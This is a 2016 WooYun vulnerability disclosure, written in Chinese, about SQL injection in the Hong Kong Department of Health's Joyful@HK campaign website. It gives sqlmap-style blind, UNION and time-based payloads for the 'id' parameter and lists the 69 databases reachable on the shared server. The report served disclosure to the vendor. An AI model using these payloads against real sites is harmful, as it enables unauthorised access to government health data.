漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2016-0224063
漏洞标题:好心情@HK官网SQL注入导致同服多个数据库测漏(香港地區)
相关厂商:好心情@HK
漏洞作者: 路人甲
提交时间:2016-06-29 09:24
修复时间:2016-07-04 09:35
公开时间:2016-07-04 09:35
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:16
漏洞状态:已交由第三方合作机构(hkcert香港互联网应急协调中心)处理
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2016-06-29: 细节已通知厂商并且等待厂商处理中
2016-06-29: 厂商已查看当前漏洞内容,细节仅向厂商公开
2016-07-04: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
「好心情@HK」(計劃)是由衞生署於2016年1月推行為期三年的全港性心理健康推廣計劃。
計劃目標:
提高公眾對心理健康推廣的參與,以及
提高公眾對精神健康的知識和了解。
详细说明:
http://**.**.**.**/sc/event_details.asp?id=3 (GET)
漏洞证明:
Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=3 AND 8705=8705
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-7236 UNION ALL SELECT CHAR(113)+CHAR(105)+CHAR(109)+CHAR(122)+CHAR(113)+CHAR(117)+CHAR(90)+CHAR(79)+CHAR(115)+CHAR(80)+CHAR(81)+CHAR(66)+CHAR(113)+CHAR(77)+CHAR(100)+CHAR(113)+CHAR(110)+CHAR(112)+CHAR(107)+CHAR(113),NULL,NULL--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: id=-9410 OR 3743=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)
---
web server operating system: Windows
web application technology: ASP
back-end DBMS: Microsoft SQL Server 2008
available databases [69]:
[*] 2plus3
[*] [2plus3-dev]
[*] [2plus3-test]
[*] [CHEUeCard-dev]
[*] [CHEUeCard-test]
[*] [CHEUenewsletter-dev]
[*] [CHEUenewsletter-test]
[*] [CHEUGame-dev]
[*] [CHEUGame-test]
[*] [CHEUGeneral-dev]
[*] [CHEUGeneral-test]
[*] [CHEUMembership-dev]
[*] [CHEUMembership-test]
[*] [ESR-dev-live]
[*] [ESR-prod-live]
[*] [ESR-test-live]
[*] [ExerciseRx-dev]
[*] [ExerciseRx-test]
[*] [healthatwork-dev-live]
[*] [healthatwork-prod-live]
[*] [healthatwork-test-live]
[*] [HEG-dev-grp01-svr01]
[*] [HEG-dev-grp01-svr02]
[*] [HEG-dev-grp02-svr01]
[*] [HEG-dev-grp02-svr02]
[*] [HEG-prod-grp01-svr01]
[*] [HEG-prod-grp01-svr02]
[*] [HEG-prod-grp02-svr01]
[*] [HEG-prod-grp02-svr02]
[*] [HEG-test-grp01-svr01]
[*] [HEG-test-grp01-svr02]
[*] [HEG-test-grp02-svr01]
[*] [HEG-test-grp02-svr02]
[*] [HEW-dev-live]
[*] [HEW-prod-live]
[*] [HEW-test-live]
[*] [MiniCHEUGeneral-dev]
[*] [MiniCHEUGeneral-test]
[*] [MiniWeb-dev]
[*] [MiniWeb-test]
[*] [StairClimbing-dev]
[*] [StairClimbing-test]
[*] [StartSmart-dev-live]
[*] [StartSmart-prod-live]
[*] [StartSmart-test-live]
[*] CHEU_HMEFORM_DEV
[*] CHEU_HMEFORM_PROD
[*] CHEU_HMEFORM_UAT
[*] CHEUeCard
[*] CHEUenewsletter
[*] CHEUenewsletter_test
[*] CHEUGame
[*] CHEUGeneral
[*] CHEUMembership
[*] cs_dev_live
[*] cs_prod_live
[*] cs_test_live
[*] ExerciseRx
[*] master
[*] mh_dev_live
[*] mh_dev_live_temp
[*] mh_prod_live
[*] mh_test_live
[*] MiniCHEUGeneral
[*] MiniWeb
[*] model
[*] msdb
[*] StairClimbing
[*] tempdb
修复方案:
参数过滤
版权声明:转载请注明来源 路人甲@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2016-07-04 09:35
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无